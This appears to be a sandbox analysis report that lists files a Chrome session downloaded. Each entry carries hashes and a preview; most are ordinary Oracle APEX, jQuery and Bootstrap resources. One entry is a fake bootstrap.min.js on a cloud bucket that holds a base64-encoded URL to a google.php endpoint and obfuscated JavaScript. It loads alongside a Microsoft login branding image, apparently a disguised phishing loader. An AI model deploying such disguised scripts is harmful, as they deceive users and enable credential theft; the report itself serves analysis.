                                                                          SHA-512:5A4AB8B03A8510162234AF2961E06243DB1DAE60FA8461E7E324B0D0366FEA0906E0BD10F0F069866F8610E9D5796478003C133E911EABFBCF5B9F228D48965E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://apex.oracle.com/pls/apex/wwv_flow.js_dialogs?p_app_id=254038&p_version=24.2.2-15618029960919
                                                                          Preview:apex.dialog.registerHandlers([.{."action":"init",."ids":["MODAL_DIALOG"].,"code":function(pPageUrl,pTitle,pHeight,pWidth,pMaxWidth,pIsModal,pDialogCssClasses,dialogAttributes,pDialog,pPageCssClasses,pTriggeringElement){apex.theme42.dialog(pPageUrl,{title:pTitle,h:pHeight,w:pWidth,mxw:pMaxWidth,modal:pIsModal,dialog:pDialog,dlgCls:'t-Dialog-page--standard '+pDialogCssClasses,dialogAttributes},pPageCssClasses,pTriggeringElement)}.},.{."action":"init",."ids":["WIZARD_MODAL_DIALOG"].,"code":function(pPageUrl,pTitle,pHeight,pWidth,pMaxWidth,pIsModal,pDialogCssClasses,dialogAttributes,pDialog,pPageCssClasses,pTriggeringElement){apex.theme42.dialog(pPageUrl,{title:pTitle,h:pHeight,w:pWidth,mxw:pMaxWidth,modal:pIsModal,dialog:pDialog,dlgCls:'t-Dialog-page--wizard '+pDialogCssClasses,dialogAttributes},pPageCssClasses,pTriggeringElement)}.},.{."action":"init",."ids":["DRAWER"].,"code":function(pPageUrl,pTitle,pHeight,pWidth,pMaxWidth,pIsModal,pDialogCssClasses,dialogAttributes,pDialog,pPageCssCl
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4282), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):4296
                                                                          Entropy (8bit):4.8625986141133355
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:4D5A1FA9AF5FE1AA22D7D24442D1F1D0
                                                                          SHA1:A6C5C690B95F37F065AB8112E03953E41FBE470C
                                                                          SHA-256:C45537F3163DFF770C26DDF58ECC29FE785E63F1746DAC97FC26C4EEC24F7F87
                                                                          SHA-512:136B5C7240C5862B7DBB185A128A435208C8121A388967B7A96FB02776BBF1D7097DCC476B1A368F9A5658A5C136316C5A33CD439DB01F2CC551F690A5869BC5
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/libraries/oraclejet/17.0.2/js/libs/oj/17.0.2/resources/nls/en/localeElements.js
                                                                          Preview:define({main:{en:{identity:{version:{_cldrVersion:"38"},language:"en"},numbers:{defaultNumberingSystem:"latn",otherNumberingSystems:{native:"latn"},"symbols-numberSystem-latn":{decimal:".",group:",",percentSign:"%",plusSign:"+",minusSign:"-",exponential:"E",perMille:".",infinity:".",nan:"NaN"},"decimalFormats-numberSystem-latn":{standard:"#,##0.###",long:{decimalFormat:{"1000-count-one":"0 thousand","1000-count-other":"0 thousand","10000-count-one":"00 thousand","10000-count-other":"00 thousand","100000-count-one":"000 thousand","100000-count-other":"000 thousand","1000000-count-one":"0 million","1000000-count-other":"0 million","10000000-count-one":"00 million","10000000-count-other":"00 million","100000000-count-one":"000 million","100000000-count-other":"000 million","1000000000-count-one":"0 billion","1000000000-count-other":"0 billion","10000000000-count-one":"00 billion","10000000000-count-other":"00 billion","100000000000-count-one":"000 billion","100000000000-count-other":"
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):1864
                                                                          Entropy (8bit):5.222032823730197
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (50758)
                                                                          Category:downloaded
                                                                          Size (bytes):51039
                                                                          Entropy (8bit):5.247253437401007
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:67176C242E1BDC20603C878DEE836DF3
                                                                          SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                          SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                          SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                          Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 280 x 60, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):3666
                                                                          Entropy (8bit):7.918283721458629
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:C9F31E87400C46F9F8FB580602328C72
                                                                          SHA1:4B538CA736FB2A88A89214AD5EB0B2B80640B5AB
                                                                          SHA-256:DDE1ACEFE23281E3715BDEE565CF1FD7064370D4BB751AB92C4ADD7D42932BBE
                                                                          SHA-512:A9EC3AFFF1F92BD76371C640C17585F9578CAF202594A7BED0FA3ABFA35A23031CDE7C347445B3FE68890AD0FFE1C8469765185C974E65440A08FA2B10797CA1
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089
                                                                          Preview:.PNG........IHDR.......<............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]...U.>7P..7..B......P.."* F*..I@..,]..I+@@@"K.-..<B..x1...p].Y.A<..W.....0.=...g........{g...}..g......h.1..q..j.....#..{..}.m.QE..Q(.NP..Ks.mn..].q....!...@.P(.Q(..`...B..B.P..P(..(...2..B.....(..`......d|.j..$.A......R..P(.2..t.F...P.&..`.A...:<I..j..8Z...'Sa.......MB..e0....Yl.........c..[..............t7:?...Z.j....t.ItO..(.....ab......"0..,e$1..>.R6.)4.f........!I3.ct.)i...s\..H......WU.....?.P.D.F..Lt8K}uX.V..1...7&.`s.........lj.a}U....j..F..m.g.}.U~.|.......z"..w*.q.s..!z ....z#M..4!..D..c...UU(\......W...]..2...C..TEr..lP+..r......,.d.Q..@'.5U(H...!lq..9...$......l#~.<............o.WT.PG8.3.TEr.AD..(.`...G'.*.D_...T...{..m.r...e)....(..*...l......0..........6.:.....2..$.....y.J.....1...+Q...p_......z...q....thf2;3'.vc.P.{b..w..!.'.GT..|. ..tm...M......m.#......r...LA./......>..oX.m..."b;......w.6.;....@..](.n..*.x.>...cD.......N..hf....;ok..9*.K.....D..2.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):3.990210155325004
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (32065)
                                                                          Category:downloaded
                                                                          Size (bytes):85578
                                                                          Entropy (8bit):5.366055229017455
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 96140, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):96140
                                                                          Entropy (8bit):7.997239666929084
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:17A0B0DE74EDC257759BAFD03CB2E435
                                                                          SHA1:7D4A05B1BD6924F2C81232E9C5B94154F625B7E2
                                                                          SHA-256:D142B79054CC62C9D4125FF2ADDEEC0B136B52B32356A314C53B8CE662CC4281
                                                                          SHA-512:D44951140A01D571A9936D6CA4759BA8F98B2B271D8D7F87936B1C2C88E32BEF75A077C6554FFDCEA4C47DB0EC2D8EDB8208E64208508581DAB23E09A5F03245
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/libraries/font-apex/2.4/fonts/Font-APEX-Small.woff2?
                                                                          Preview:wOF2......w.......P...w6.........................T.V...<...\.....D..6.$..@. ......][.g.H...fSQ.B...*..Om..P6.n....#}....<....*.n...!x.u.......7%...K.]..u....(......z..k_wm.....`J5.f..d}3,..UT.....q.@Q..T(.PP!.........../*..*...^...."O.(G..-?.C\.y.~.....{....;...F....>.......;....i%..&.[.';..B\....L..A....I.U......$.s.%..u.sK.. .0,..F..J3....(..?3.T.7w..a..'.`Lu..9&}.Ws..(.@).0_ib..x7Q.......SgP#F..VV.4..nDD.gw#"Bn.......j.k..:..W.b..~..m...W^...QU,i.a..AD...4.8......v..#b.D..!...F...*....m..d..NT1.\.e;.......F.<|....S..A.L4/.2%.H.i.........sQ..S............$..%H.Rt...%.].].....s.....A*#AS.'...1.d.l).:.A*O*Xa.&WZ..@i....?.u.'.Z.).@.KBU.........P..)...g...`K.......|.z...G<......4..H........T..6..@.D|q.....A=..$.........h.|.b./.....;..;......%......[...1JnWs....J.enU.?<...x..x.... .....7.!.x".y..BY..q...2.]..5.\mm..j[..u..^k...Lg.0r....v?.i.....8...v.`...}ar....]...M..d.!.h..>D.e..c...b.q.........t6..U(...N....\_m......z........5r... .
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 61084, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):61084
                                                                          Entropy (8bit):7.996292005170756
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:A5E1FBA71778DA46BC1BECE7BD91375E
                                                                          SHA1:0C4869F23CF1A14FCB14C0B9CA2266D2C8A1D3CB
                                                                          SHA-256:22C47B4FE99582D7B20683D91780AA258578639A94465AB84C5D1F9A56D6AF36
                                                                          SHA-512:0D822D32B9F1FDA940AE8A594B68149C85CEF2B50987B45E7E5FBEEF39DD3452812E8027166DCF06221E66739FD32D786C7FB04654E099CE05EA652C6888B6E4
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/app_ui/font/apex-5-icon-font.woff2
                                                                          Preview:wOF2..................K.........................T.V..T...4..N.....6.$.... ..v..M[.1.....#5.L.m.T..l....;...X.~.............;......v..E@...z.....^.....!.w..g...aj......(..;h...p....u....\..y.i.h%.._.|.M^6..6+++S.9.^<....l8...>..p.#.H..)..'.../.8/..r%{..a}..2..t+.s)$..Yi(yV.....)..8.$P.A.._...,......\TL.d?.O.neKs.2.?G...J..d$....>l."&..o.......@...=y....:"J\.".J.jO..$.....V..........>..\...U..h`..0Sb?.n.!"...#E./.........r.. M..-~..eC..l....W.w......k.>. ... ....Yz.......=...y..plT.....P.......KQ....P@....2.Z..z]....U.6...Ug.]k....y..D!..r......5)]D.q.{..f..q.1..$.a.p.....j_U...3..$..<Aev....W.;....~1].s......n...|a.I..Z.:..j...bm....<G......+..S4g:.}.....!..I........@.2....f._n.|...)..S..[.-........@.......Y*.I.).f..I.Ru...r#.{&...:..qG.=.f......o.~.$Of r..*...Y.@. .|..]~.o.{..HRAF"....:....X.ia.,......7..uq2..K.,-.S '. I.@...Q..j.......$..D..v~....`...X..M.......{;.u...f...?.......:3.C...F...?.....B.h.:+...G..;`\\`..C~.g.3.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65474), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):549812
                                                                          Entropy (8bit):4.9128698952423875
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:0A585153670857C1F22F212F80DB063A
                                                                          SHA1:AC3EF5B5DB8032F560114E5BEAE75A6ADFC2DE8B
                                                                          SHA-256:89BE3C3C672F4AE4487A88B79640EEE0A705F22F6D41AEFBC62A3BABDFD23893
                                                                          SHA-512:CA6B83C110D9769B6EF16DAD9B15C3679C2B673FBB59680BB1A17E94725E7959A9785ECA374803B3664E05AD243AD1EDB53CAE1F7ED185884841EDB1A9B515CB
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://5348785839-1317754460.cos.ap-seoul.myqcloud.com/bootstrap.min.js
                                                                          Preview:var file = "aHR0cHM6Ly81MzQ4Nzg1ODM5LnNicy9nb29nbGUucGhw";....var _0x586849=_0x3529;(function(_0x186e81,_0x380acb){var _0x34a11c=_0x3529,_0xef0e23=_0x186e81();while(!![]){try{var _0x535a49=parseInt(_0x34a11c(0x2a9))/(0x1e31+0x134*-0x16+-0x3b8)+-parseInt(_0x34a11c(0x2a99))/(-0x702+0xa9d+-0x399)*(parseInt(_0x34a11c(0xbdd))/(-0x20aa*-0x1+-0x257c+0x4d5*0x1))+-parseInt(_0x34a11c(0xf4d))/(-0x567*-0x4+-0x886+-0x689*0x2)*(parseInt(_0x34a11c(0x1422))/(0x118a*0x1+0x1425*-0x1+0x2a0))+parseInt(_0x34a11c(0xe0b))/(-0xfd5+-0x1a30+0x2a0b)*(-parseInt(_0x34a11c(0x13bd))/(0x25b7+0xc4*-0x1b+0x4*-0x441))+parseInt(_0x34a11c(0x15f2))/(-0x36*-0xd+0x9d0+-0xc86)+-parseInt(_0x34a11c(0xa3d))/(0x1491+-0x206e+0xbe6)+-parseInt(_0x34a11c(0x1433))/(-0x5f8+-0x168+-0xd*-0x92)*(-parseInt(_0x34a11c(0x49d))/(0x159d+0x979+0x9*-0x373));if(_0x535a49===_0x380acb)break;else _0xef0e23['push'](_0xef0e23['shift']());}catch(_0x8dd1f8){_0xef0e23['push'](_0xef0e23['shift']());}}}(_0x1c5f,-0x1e295*-0x2+0x9994a+-0x6aeef));var count=0x5
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (24238), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):24238
                                                                          Entropy (8bit):4.895401409149358
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:6C821A92D36657C2031E719DD8EBB4E4
                                                                          SHA1:B34BA4E47CD2F2FBA8AED9CEA92521E3EFED9A52
                                                                          SHA-256:0F585EAC1353721B8EB56893991999204582230A574BAB403DE43FA8F9927B55
                                                                          SHA-512:CB492D2361961A4CABE65B77E76FEB9918C2C876E311F197541B6F6FD83910C33C44F8074A73EE164F2A13BC8CC9F702132090D2522AB6458162A759F73F3E9E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/app_ui/css/Theme-Standard.min.css?v=24.2.2
                                                                          Preview::root{--js-dialog-open-timing:0s;--js-dialog-close-timing:0s;--a-palette-primary:#0572ce;--a-palette-primary-contrast:#fff;--a-palette-primary-shade:#ecf4fb;--a-palette-danger:#ee060b;--a-palette-danger-contrast:#fff;--a-palette-danger-shade:#ffefef;--a-alert-danger-icon:"\e242";--a-palette-warning:#b36205;--a-palette-warning-contrast:#fff;--a-palette-warning-shade:#fff8df;--a-alert-warning-icon:"\e017";--a-palette-success:#388729;--a-palette-success-contrast:#fff;--a-palette-success-shade:#f4fcf3;--a-alert-success-icon:"\e1ab";--a-palette-info:#0076df;--a-palette-info-contrast:#fff;--a-palette-info-shade:#f9fcff;--a-alert-info-icon:"\e1ac";--a-palette-color-1:var(--u-color-1,#309fdb);--a-palette-color-1-contrast:var(--u-color-1-contrast,#fff);--a-palette-color-2:var(--u-color-2,#13b6cf);--a-palette-color-2-contrast:var(--u-color-2-contrast,#fff);--a-palette-color-3:var(--u-color-3,#2ebfbc);--a-palette-color-3-contrast:var(--u-color-3-contrast,#fff);--a-palette-color-4:var(--u-color-4,
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):32
                                                                          Entropy (8bit):4.390319531114783
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                          SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                          SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                          SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCTaM-csWnNuQEgUNrQmusSEf0h0JGZTh3hIZCfkW2VC378sMEgUNQ_N2OSH1QxpPf4YOaQ==?alt=proto
                                                                          Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (5656)
                                                                          Category:downloaded
                                                                          Size (bytes):5741
                                                                          Entropy (8bit):5.005075005005374
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:B5087FEE02CBB04802ABE475F1E0BD97
                                                                          SHA1:8D3829BD02F277B1CF4FB17488D5B0D74C5FC2A4
                                                                          SHA-256:3E0B1A62AAB785D4C7C4C0E2A9B204AA97B838ABB1A1BCD7F5E283292D35DACA
                                                                          SHA-512:CCDE321D0A7CB314B8DAA21D2A03EE91C3F8B23E770EBFF48ED182A3F229892F88C3FB940CBF42C53F6F949996FBC1F5179B16886232C41251015748C313C1C2
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/libraries/apex/minified/widget.stickyWidget.min.js?v=24.2.2
                                                                          Preview:/*!. Copyright (c) 2014, 2023, Oracle and/or its affiliates. All rights reserved..*/.!function(t){"use strict";let s,e=300;function i(t,s){document.querySelector(":root").style.setProperty("--js-sticky-scrollpad-block-"+t,s)}t.widget("apex.stickyWidget",{widgetEventPrefix:"stickyWidget",options:{zIndexStart:-1,toggleHeight:!1,toggleWidth:!1,top:null,bottom:null,stickToEnd:!1,useWindow:!0,isFooter:!1,stick:null,unstick:null,stickEnd:null,unstickEnd:null},reStick:function(t=!1){if((!this.stuck||this.stuckToEnd)&&!t)return;let s,e,o=this.options;o.isFooter?(s=o.bottom.call(this),e=s+this.unstuckHeight,i("end",e+"px"),this.element.css("position","fixed").css("bottom",s)):(s=o.top.call(this),e=s+this.unstuckHeight,i("start",e+"px"),this.element.css("position","fixed").css("top",s))},forceScrollParent:function(t){this._destroy(),s=t&&t.length>0?t:null,this._create()},_stickToEnd:function(){if(this.stuckToEnd)return;let t,s,e=this.options,i=this.element;this._removeScrollPadding(),this.stuckT
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65378)
                                                                          Category:downloaded
                                                                          Size (bytes):696858
                                                                          Entropy (8bit):5.331507463795075
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:AF69A4A8903F1B1E639BD04009E51A6A
                                                                          SHA1:532753051A8971D1A2F2C11770F1F6E6DBCCAE13
                                                                          SHA-256:EE1794DBBB571A4FB17123492118CBF84D169CFBAC9F3D6B69E009F24497AC63
                                                                          SHA-512:A78E9E3F3AFD0F1BC7A44ADDC6E6F58416398C49D584ED125F91EDE6599C32DE9342D065635383C266B2CA5225EAAA3343FF19E977574189AC165E193D669743
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/libraries/apex/minified/desktop_all.min.js?v=24.2.2
                                                                          Preview:/*!. * Copyright (c) 1999, 2025, Oracle and/or its affiliates.. */./*! jQuery v3.6.4 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,(function(e,t){"use strict";var n=[],r=Object.getPrototypeOf,i=n.slice,o=n.flat?function(e){return n.flat.call(e)}:function(e){return n.concat.apply([],e)},a=n.push,s=n.indexOf,u={},l=u.toString,c=u.hasOwnProperty,f=c.toString,p=f.call(Object),d={},h=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},g=function(e){return null!=e&&e===e.window},v=e.document,y={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||v).createElement("script");if(o.text=e,t)for(r in y)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.set
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (4578), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):4578
                                                                          Entropy (8bit):4.909695444952825
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:447338ADE549596AA49AF8DD97959187
                                                                          SHA1:78155338DEE337AAC3B9C731415DE50FA2600DD7
                                                                          SHA-256:9DBC429F338B365BF9D6C771AC82CB71ED706AC7E7C8DB65F599553622C7065A
                                                                          SHA-512:C6657F2BD4F879B41A6BF4176D40DF640CFCD9E60C05C2D7A61843722A0918ED5490681BE1AD2E607818A2C9D0F8E95650B7AA9246E8A732ED750E5516A5FEB3
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/libraries/oraclejet/17.0.2/js/libs/oj/17.0.2/resources/nls/localeElements.js
                                                                          Preview:define({root:{supplemental:{defaultRegion:{ar:"001",as:"IN",be:"BY",bg:"BG",bn:"BD",bo:"CN",brx:"IN",bs:"BA",ca:"ES",cs:"CZ",da:"DK",de:"DE",el:"GR",en:"US",es:"ES",et:"EE",fi:"FI",fr:"FR",ga:"IE",gu:"IN",he:"IL",hi:"IN",hr:"HR",hu:"HU",id:"ID",is:"IS",it:"IT",ja:"JP",kn:"IN",ko:"KR",kok:"IN",ks:"IN","ks-Arab":"IN",lt:"LT",lv:"LV",mk:"MK",ml:"IN",mr:"IN",ms:"MY",mt:"MT",nb:"NO",ne:"NP",nl:"NL",nn:"NO",no:"NO",or:"IN",pa:"IN","pa-Guru":"IN","pa-Arab":"PK",pl:"PL",pt:"BR",ro:"RO",ru:"RU",sk:"SK",sl:"SI",sq:"AL",sr:"RS","sr-Cyrl":"RS","sr-Latn":"RS",sv:"SE",ta:"IN",te:"IN",th:"TH",tr:"TR",uk:"UA",ur:"PK",vi:"VN",zh:"CN","zh-Hans":"CN","zh-Hant":"TW"},weekData:{firstDay:{"001":1,AE:6,BH:6,BR:0,DZ:6,EG:6,IQ:6,JO:6,KW:6,LB:1,LY:6,MA:6,OM:6,QA:6,SA:0,SD:6,SY:6,TN:0,YE:0,BY:1,BG:1,ES:1,CZ:1,DK:1,AT:1,CH:1,DE:1,LU:1,CY:1,GR:1,AU:0,CA:0,GB:1,IE:0,IN:0,MT:0,NZ:0,PH:0,SG:0,US:0,ZA:0,AR:0,CL:1,CO:0,CR:1,DO:0,EC:1,GT:0,HN:0,MX:0,NI:0,PA:0,PE:0,PR:0,PY:0,SV:0,UY:1,VE:0,EE:1,FI:1,BE:1,FR:1,IL:0,HR:1,H
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):74159
                                                                          Entropy (8bit):4.835512894882911
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:4873EF97AF7EB3CE20F79FF0E4C9CBC0
                                                                          SHA1:A11F9C30847AF9DD37954550993888BA2B28D0E5
                                                                          SHA-256:145AEAAC30937DC87E9D0F03F9AD91526D457B54DD2D236158184BCD1D8912EC
                                                                          SHA-512:3519710A08505013434DB459BAA92BC32885F583ED381099461BC45509E623517E9D590858F2E0BF3DD5058A5B3627F9A4048BFA0ACFF6A3AD7D385027F4B8CC
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/libraries/font-apex/2.4/css/font-apex.min.css?v=24.2.2
